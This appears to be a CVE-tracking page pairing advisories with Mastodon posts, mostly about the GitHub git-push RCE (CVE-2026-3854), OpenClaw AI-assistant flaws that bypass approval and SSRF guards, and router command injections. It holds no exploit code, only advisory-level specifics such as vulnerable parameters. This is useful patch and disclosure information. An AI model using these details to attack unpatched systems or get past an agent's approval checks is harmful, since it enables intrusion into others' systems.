wiz.io/blog/github-rce-vulnera

##

571906@ap.podcastindex.org at 2026-04-29T02:00:02.000Z ##

New Episode: SANS Stormcast Wednesday, April 29th, 2026: Odd Vercel Header Usage; GitHub Vuln Patches; MSFT RDP Notification Bug

Shownotes:

HTTP Requests with X-Vercel-Set-Bypass-Cookie Header
https://isc.sans.edu/diary/HTTP%20Requests%20with%20X-Vercel-Set-Bypass-Cookie%20Header/32930
GitHub Vulnerability CVE-2026-3854
https://www.wiz.io/blog/github-rce-vulnerability-cve-

Transcript

AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans

Or Listen right here.

##

tisba@ruby.social at 2026-04-29T10:11:40.000Z ##

Aside from the abysimal uptime Github currently presents, they -also- had one of the worst security incidents you can think of: An RCE via a simple “git push” with total loss of tenant isolation (via wiz.io/blog/github-rce-vulnera).

If GitHub weren't such a central piece of infrastructure, the current situation would be disastrous for their business.

I am afraid this is just the beginning. #github #security

##

bruce@hachyderm.io at 2026-04-29T09:59:28.000Z ##

GitHub remote code execution vulnerability found (and patched). This writeup is good. It digs deep into the details.
wiz.io/blog/github-rce-vulnera

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

Cette faille GitHub est exploitable par un simple Git Push (CVE-2026-3854) it-connect.fr/cette-faille-git #ActuCybersécurité #Cybersécurité #Vulnérabilité #GitHub

##

mastokukei@social.josko.org at 2026-04-29T09:05:30.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei masto.kukei.eu/browse/programm category:
- **AI coding tools and incidents**: Claude-powered AI agent deletes company database; GitHub Copilot switching to usage-based billing; GitHub RCE vulnerability (CVE-2026-3854).
- **GitHub and open-source migrations**: BookStack moves from GitHub to Codeberg; Ghostty and other projects leaving GitHub; Warp terminal open-sourced.
- **PostgreSQL [1/2]

##

mastokukei@social.josko.org at 2026-04-29T09:04:20.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #technologyAtKukei masto.kukei.eu/browse/technolo category:
- **GitHub reliability and security issues**: Frequent outages, RCE vulnerabilities (CVE-2026-3854), and concerns over AI integration (Copilot pricing changes, usage-based billing).
- **AI controversies and corporate deals**: Anthropic’s partnerships (Blender, Adobe), Google’s Pentagon AI deal, OpenAI’s legal battles with Elon Musk, and AI’s role [1/3]

##

hnbest@mastodon.social at 2026-04-29T08:00:02.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

offseq at 2026-04-29T07:30:27.513Z ##

⚠️ CRITICAL: CVE-2026-3854 lets users with push access run arbitrary code on GitHub backend servers. Impacts GitHub.com & Enterprise Server. GitHub.com patched 2026-03-04; ES patch 2026-03-10. Patch ASAP! No wild exploits found. radar.offseq.com/threat/critic

##

mackuba@martianbase.net at 2026-04-29T20:47:26.000Z ##

Uh… this seems bad wiz.io/blog/github-rce-vulnera

##

CuratedHackerNews@mastodon.social at 2026-04-29T16:21:04.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

beyondmachines1@infosec.exchange at 2026-04-29T15:01:43.000Z ##

GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server

GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.

**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

nixCraft@mastodon.social at 2026-04-29T14:31:29.000Z ##

With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance nvd.nist.gov/vuln/detail/CVE-2

##

F30@chaos.social at 2026-04-29T11:58:04.000Z ##

"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
wiz.io/blog/github-rce-vulnera

##

tisba@ruby.social at 2026-04-29T10:11:40.000Z ##

Aside from the abysimal uptime Github currently presents, they -also- had one of the worst security incidents you can think of: An RCE via a simple “git push” with total loss of tenant isolation (via wiz.io/blog/github-rce-vulnera).

If GitHub weren't such a central piece of infrastructure, the current situation would be disastrous for their business.

I am afraid this is just the beginning. #github #security

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

Cette faille GitHub est exploitable par un simple Git Push (CVE-2026-3854) it-connect.fr/cette-faille-git #ActuCybersécurité #Cybersécurité #Vulnérabilité #GitHub

##

hnbest@mastodon.social at 2026-04-29T08:00:02.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

offseq@infosec.exchange at 2026-04-29T07:30:27.000Z ##

⚠️ CRITICAL: CVE-2026-3854 lets users with push access run arbitrary code on GitHub backend servers. Impacts GitHub.com & Enterprise Server. GitHub.com patched 2026-03-04; ES patch 2026-03-10. Patch ASAP! No wild exploits found. radar.offseq.com/threat/critic #OffSeq #GitHub #Infosec

##

hn250@social.lansky.name at 2026-04-29T02:10:12.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

wwahammy@treehouse.systems at 2026-04-29T01:20:29.000Z ##

There should be a "but the service is never up to be exploited" reducer on the CVE score.
wiz.io/blog/github-rce-vulnera

##

jschauma@mstdn.social at 2026-04-29T00:36:54.000Z ##

Question about the GitHub RCE:

wiz.io/blog/github-rce-vulnera says GHES patches were _released_ on 03/10.

github.blog/security/securing- says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".

So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?

##

obivan@infosec.exchange at 2026-04-28T21:53:56.000Z ##

Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) wiz.io/blog/github-rce-vulnera

##

hackersnews@mastodon.cesium.pw at 2026-04-28T20:30:11.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
news.ycombinator.com/item?id=4

#hackernews #tech

##

lobsters@mastodon.social at 2026-04-28T19:55:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown lobste.rs/s/8fxgx7 #security #vibecoding
wiz.io/blog/github-rce-vulnera

##

hn100@social.lansky.name at 2026-04-28T19:45:08.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-04-28T19:00:06.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-28T19:00:10.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: wiz.io/blog/github-rce-vulnera
Comments: news.ycombinator.com/item?id=4

##

Xavier@infosec.exchange at 2026-04-28T18:59:08.000Z ##

@GossiTheDog Here's a non-Twitter link: wiz.io/blog/github-rce-vulnera

##

blainsmith@fosstodon.org at 2026-04-28T18:58:41.000Z ##

HAHAHAHAHHAHAHAHAHAHAH wiz.io/blog/github-rce-vulnera

##

GossiTheDog@cyberplace.social at 2026-04-28T18:56:22.000Z ##

Wiz got RCE on the cloud version of Github.com and access to every customer environment.

To do this they just reversed the on prem version and found a simple vuln.

wiz.io/blog/github-rce-vulnera

##

hackerworkspace@infosec.exchange at 2026-04-28T18:27:48.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog

wiz.io/blog/github-rce-vulnera

Read on HackerWorkspace: hackerworkspace.com/article/gi

#aisecurity #vulnerability #exploit

##

ngate@mastodon.social at 2026-04-28T18:23:21.000Z ##

🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
wiz.io/blog/github-rce-vulnera #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated

##

h4ckernews@mastodon.social at 2026-04-28T18:23:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec

##

CuratedHackerNews@mastodon.social at 2026-04-28T17:35:05.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

bortzmeyer@mastodon.gougere.fr at 2026-04-28T16:53:20.000Z ##

Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».

Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.

Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.

wiz.io/blog/github-rce-vulnera

##

CVE-2026-42431(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:30:21

1 posts

## Impact OpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` persistent profile-mutation guard. node.invoke(browser.proxy) could mutate persistent browser profiles through a path that bypassed the browser.request guard. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affecte

thehackerwire@mastodon.social at 2026-04-28T21:00:05.000Z ##

🟠 CVE-2026-42431 - High (8.1)

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42426(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:28:53

1 posts

## Impact OpenClaw `node.pair.approve` placed in `operator.write` scope instead of `operator.pairing` allows unprivileged pairing approval. The pairing approval method accepted operator.write instead of the narrower pairing scope and admin requirement for exec-capable nodes. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a

thehackerwire@mastodon.social at 2026-04-28T21:02:23.000Z ##

🟠 CVE-2026-42426 - High (8.8)

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42423(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-28T18:28:19

1 posts

## Impact strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts. The approval-timeout fallback could allow inline eval commands that strictInlineEval was meant to require explicit approval for. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service bo

thehackerwire@mastodon.social at 2026-04-28T21:00:33.000Z ##

🟠 CVE-2026-42423 - High (7.5)

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41914(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:26:36

1 posts

## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths. QQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - A

thehackerwire@mastodon.social at 2026-04-28T21:02:34.000Z ##

🟠 CVE-2026-41914 - High (8.5)

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41912(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:25:57

1 posts

## Impact Browser SSRF Policy Bypass via Interaction-Triggered Navigation. Browser interactions could trigger navigations that bypassed the normal SSRF navigation checks. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected v

thehackerwire@mastodon.social at 2026-04-28T21:14:03.000Z ##

🟠 CVE-2026-41912 - High (7.6)

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41405(CVSS UNKNOWN)

EPSS: 0.14%

updated 2026-04-28T18:24:06

1 posts

## Summary MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped. ## Affected Packages / Versions - Package: `openclaw`

thehackerwire@mastodon.social at 2026-04-28T21:13:54.000Z ##

🟠 CVE-2026-41405 - High (7.5)

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41404(CVSS UNKNOWN)

EPSS: 0.07%

updated 2026-04-28T18:23:43

1 posts

## Summary Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode ## Current Maintainer Triage - Normalized severity: high - Assessment: v2026.3.28 still misses trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased. ## Affected Packages / Versio

thehackerwire@mastodon.social at 2026-04-28T21:50:08.000Z ##

🟠 CVE-2026-41404 - High (8.8)

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41399(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-04-28T18:22:28

1 posts

## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget. ## Impact An unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients. ## Affected Component `src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts` #

thehackerwire@mastodon.social at 2026-04-28T21:49:58.000Z ##

🟠 CVE-2026-41399 - High (7.5)

OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41394(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-04-28T18:20:50

1 posts

## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scopes ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still gives auth:"plugin" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes. ## Affected Packages / Versions -

thehackerwire@mastodon.social at 2026-04-28T22:00:01.000Z ##

🟠 CVE-2026-41394 - High (8.2)

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41387
(9.7 CRITICAL)

EPSS: 0.02%

updated 2026-04-28T18:18:46

1 posts

## Summary Host exec env override sanitization did not fail closed for several package-manager and related redirect variables that can steer dependency fetches or startup behavior. ## Impact An approved exec request could silently redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content. ## Affected Component `src/infra/host-env-sec

thehackerwire@mastodon.social at 2026-04-28T22:31:12.000Z ##

🟠 CVE-2026-41387 - High (7.8)

OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41386(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:18:23

1 posts

## Summary Bootstrap setup codes were not bound to the intended device role and scopes, allowing first-use privilege escalation during pairing. ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real first-use bootstrap privilege-escalation bug fixed and shipped in v2026.3.22+, so keep open for publication with current severity. ## Affected Packages / Versions

thehackerwire@mastodon.social at 2026-04-28T22:30:45.000Z ##

🔴 CVE-2026-41386 - Critical (9.1)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41383(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-28T18:17:19

1 posts

## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbitrary absolute `remoteWorkspaceDir` and `remoteAgentWorkspaceDir` values. In mirror mode, those paths were then used as the target of remote cleanup and overwrite operations. ## Impact If an attacker could influence those OpenShell config values, mirror sync could delete the contents of an unintended remote directory

thehackerwire@mastodon.social at 2026-04-28T22:00:22.000Z ##

🟠 CVE-2026-41383 - High (8.1)

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41378(CVSS UNKNOWN)

EPSS: 0.18%

updated 2026-04-28T18:15:32

1 posts

## Summary Paired node escalates to gateway RCE via unrestricted node.event agent dispatch ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required.

thehackerwire@mastodon.social at 2026-04-28T22:31:31.000Z ##

🟠 CVE-2026-41378 - High (8.8)

OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41602
(7.5 HIGH)

EPSS: 0.13%

updated 2026-04-28T15:31:54

1 posts

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue.

thehackerwire@mastodon.social at 2026-04-29T01:00:17.000Z ##

🟠 CVE-2026-41602 - High (7.5)

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation

This issue affects Apache Thrift: before 0.23.0.

Users are recommended to upgrade to version 0.23.0, which fixes the issue.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27760
(8.1 HIGH)

EPSS: 0.10%

updated 2026-04-28T15:30:58

1 posts

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter. Attackers can break out of the define() string context in config.php using a single quote and statement separator to inject malicious PHP code that pers

thehackerwire@mastodon.social at 2026-04-29T00:15:45.000Z ##

🟠 CVE-2026-27760 - High (8.1)

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7289
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T15:30:58

1 posts

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-28T23:38:03.000Z ##

🟠 CVE-2026-7289 - High (8.8)

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7288
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T15:30:58

1 posts

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-28T23:28:00.000Z ##

🟠 CVE-2026-7288 - High (8.8)

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5944
(8.2 HIGH)

EPSS: 0.09%

updated 2026-04-28T15:30:52

1 posts

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment environment without authentication. An unauthenticated attacker with network access can exploit this vulnerability by sending crafted requests to the expo

thehackerwire@mastodon.social at 2026-04-29T00:16:05.000Z ##

🟠 CVE-2026-5944 - High (8.2)

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3323
(7.5 HIGH)

EPSS: 0.01%

updated 2026-04-28T12:31:36

1 posts

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

thehackerwire@mastodon.social at 2026-04-29T00:59:57.000Z ##

🟠 CVE-2026-3323 - High (7.5)

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7242
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T09:34:20

1 posts

A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setOpenVpnClientCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument enabled can lead to os command injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

Matchbook3469@mastodon.social at 2026-04-29T08:39:16.000Z ##

🔴 New security advisory:

CVE-2026-7242 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#InfoSec #VulnerabilityManagement #CyberSec

##

CVE-2026-7243
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T09:34:20

1 posts

A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setRadvdCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument maxRtrAdvInterval leads to os command injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

offseq@infosec.exchange at 2026-04-28T12:30:30.000Z ##

🚨 CVE-2026-7243: Critical OS command injection in Totolink A8000RU (7.1cu.643_b20200521). Remote, unauthenticated RCE risk — public exploit out, no patch yet. Lock down management access & monitor for updates. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #RouterSecurity

##

CVE-2026-7248
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-04-28T09:34:20

1 posts

A vulnerability was found in D-Link DI-8100 16.07.26A1. This affects the function tgfile_htm of the file tgfile.htm of the component CGI Endpoint. The manipulation of the argument fn results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used.

offseq@infosec.exchange at 2026-04-28T09:30:29.000Z ##

⚠️ CRITICAL: CVE-2026-7248 in D-Link DI-8100 (fw 16.07.26A1) enables remote buffer overflow via 'fn' in CGI Endpoint. No patch available — restrict access & monitor for updates. Exploit code is public. radar.offseq.com/threat/cve-20 #OffSeq #DLink #Vuln #Infosec

##

CVE-2026-7244
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T09:34:19

1 posts

A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument merge results in os command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.

offseq@infosec.exchange at 2026-04-28T11:00:37.000Z ##

Totolink A8000RU (v7.1cu.643_b20200521) faces CRITICAL OS command injection (CVE-2026-7244, CVSS 9.3). Remote, unauthenticated exploit possible. No patch yet — restrict mgmt access & monitor for updates. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #RouterSecurity #CVE2026_7244

##

CVE-2026-5201
(7.5 HIGH)

EPSS: 0.09%

updated 2026-04-28T09:34:12

1 posts

A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of servi

1 repos

https://github.com/kagancapar/CVE-2026-5201

linux@activitypub.awakari.com at 2026-04-28T03:12:25.000Z ## Oracle Linux 9 gdk-pixbuf2 Important Fix ELSA-2026-10708 CVE-2026-5201 The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network:

#Oracle #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-32644
(9.8 CRITICAL)

EPSS: 0.02%

updated 2026-04-28T03:31:36

2 posts

Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.

offseq@infosec.exchange at 2026-04-28T06:30:26.000Z ##

CVE-2026-32644 (CRITICAL, CVSS 9.2): Milesight MS-Cxx63-PD cameras have default SSL private keys, exposing encrypted traffic to interception & tampering. No patch yet — restrict access & follow vendor updates. radar.offseq.com/threat/cve-20 #OffSeq #IoTSecurity #Vulnerability

##

thehackerwire@mastodon.social at 2026-04-28T02:07:24.000Z ##

🔴 CVE-2026-32644 - Critical (9.8)

Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7203
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T03:31:36

2 posts

A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os command injection. The attack can be launched remotely. The exploit has been made public and could be used.

offseq@infosec.exchange at 2026-04-28T03:30:33.000Z ##

🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) suffers from OS command injection (CVE-2026-7203). Remote, unauthenticated attackers can fully compromise affected routers. No patch confirmed — disable remote mgmt & isolate. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #IoTSec

##

thehackerwire@mastodon.social at 2026-04-28T01:43:52.000Z ##

🔴 CVE-2026-7203 - Critical (9.8)

